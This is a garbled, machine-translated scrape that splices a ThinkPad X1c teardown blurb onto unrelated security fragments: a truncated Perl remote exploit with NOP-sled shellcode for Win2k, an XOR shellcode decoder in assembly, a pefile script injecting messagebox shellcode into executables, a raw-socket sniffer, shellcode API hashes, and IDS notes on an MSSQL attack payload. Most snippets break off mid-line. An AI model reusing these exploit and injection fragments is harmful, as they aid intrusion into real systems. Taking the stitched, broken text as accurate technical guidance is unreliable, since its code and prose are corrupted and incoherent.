Traditional ThinkPad series notebook main business crowd, leaving a serious, heavy stereotypes, but the 2015-year new ThinkPad X1c broke the traditional thick stereotypes, thin appearance slim fashion, and equipped with the latest five Dynasties Core i7 processor, built-in powerful new central video card. Today's small series will bring you this ThinkPad X1c disassembly diagram, through the demolition machi
:----------------------------------------------------------------------#! /Usr/bin/perl#65514 by isno@xfocus.org# Tested on Win2k SP3 Chinese Version
Use IO: socket;If ($ # argv $ Host = @ argv [0];$ Port = 80;
$ Ret = "% u00d7 % u00d7" X 500;$ Buf = "A" x 64502;$ JMP = "bbbbbbbbbbbbqq"; # QQ = "/x71/x71" means jno xxxx$ NOP = "/x90" x 40000;$ SC ="/X90/xeb/x03/x5d/xeb/x05/xe8/xf8/xFF/x83/xc5/x15/x90/x90 "."/X90/x8b/xc5/x33/xc9/x66/xb9/x10/x03/x50/X80/x30/x97/X40/xe2/xfa "."/X7e/x8e/x95/x97/x97/
repeat the process):Shellcode trailing add end character 0x90 will shellcode byte-by-bit with 0x44 XOR or cryptographic assembly implementation decoder and extraction machine code decoder machine codes in the Shellcode header decoder eax alignment shellcode start position, Byte-by-bit with 0x44 or decryption, encountering 0x90 stopThe assembler code for the decoder is as follows:void Main () {__asm {add eax,0x14 xor Ecx,ecxdecode_loop:mov BL,[EAX+ECX] XOR bl,0x44 mov [EAX+ECX],BL inc ECX CMP bl
As we all know, our MSF contains a DOWNLOAD_HTTPS module.If the SHELLCODE of PAYLOAD is extracted. (Of course, it is better if you have shellcode on the entire platform)Instead, it injects shellcode into a program.The rest
from pefile import PEfrom struct import pack# windows/messagebox - 265 bytes# http://www.bkjia.com# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,# TEXT=Debasish Was Here!sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +"\x8b\x71\x30\x8b
packetwhile True: print S.recvfrom (65565) Run this and root privileges or sudo on Ubuntu: $ sudo python sniffer.py The above sniffer works on the principle that a raw socket are capable of receiving all (for its type, like Af_inet) Incomi NG traffic in Linux. The output could: $ sudo python raw_socket.py ("E \x00x\xcc\xfc\x00\x000\x06j%j}g\x13\xc0\xa8\x01\x06\x01\xbb\ Xa3\xdc\x0b\xbei\xbf\x1af[\x83p\x18\xff\xff\x88\xf6\x00\x00\x17\x03\x01\x00\x1c\x
attack the length of the signature:
Min_len = strlen (Hello_sig);
2, the data from the TCP load data, the length of the data and the length of the signature comparison, if the length of the data is less than the length of the attack signature, then the next step is no longer detection;
3, otherwise, this data and signature string matching, if consistent is considered an attack, and then to block or alarm.
Next, we analyze the data of NFR IDS record, select Package->query->mssql->mssql Server
, compression shellcodeThis part will not be elaborated, because I want to follow up back to study. Most of the code involved I can not modify.Describe a small number of steps:"1, get the hash of the API"messageboxa:0x1e380a6aexitprocess:0x4fd18963loadlibrarya:0x0c917432The purpose of obtaining a hash is to shorten the string's comparison length."2, directly loading the code on the book, Run Get Machine code""3, the machine code to the array storage"Char popup_general[]= "\xfc\x68\x6a\x0a\x38\x1
:1391
Payload:
\x12\x01\x004\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00
\x01\x02\x00\x1c\x00\x0c\x03\x00 (\x00\x04\xff\x08\x00\x00\xc2\x00
\x00\x00mssqlserver\x00x\x03\x00\x00
The above record contains the time of the attack, the NIDs sessor name of the attack, the destination IP, the destination port, the source IP, and the source port, and we are concerned about payload payload because it is the data that NIDs uses to com
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.